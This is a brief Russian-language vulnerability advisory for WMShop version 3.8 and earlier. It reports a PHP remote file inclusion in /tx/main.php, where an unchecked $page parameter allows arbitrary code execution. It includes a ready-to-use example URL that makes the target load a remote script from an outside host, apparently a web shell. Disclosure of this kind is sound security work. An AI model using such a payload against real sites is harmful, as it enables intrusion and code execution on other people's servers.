Уязвимые продукты: WMShop <= 3.8 (возможно и старше) 
Тип: PHP-Include 
Результат: Выполнение произвольного кода, 
Уязвимость в скрипте /tx/main.php 
Отсутствует проверка переменной $page. 
Пример:
 
http://target/tx/main.php?page=http://inferno.rootlab.ru/remviewtxt 

Автор: DeCode(iNFERNo)

Оставить мнение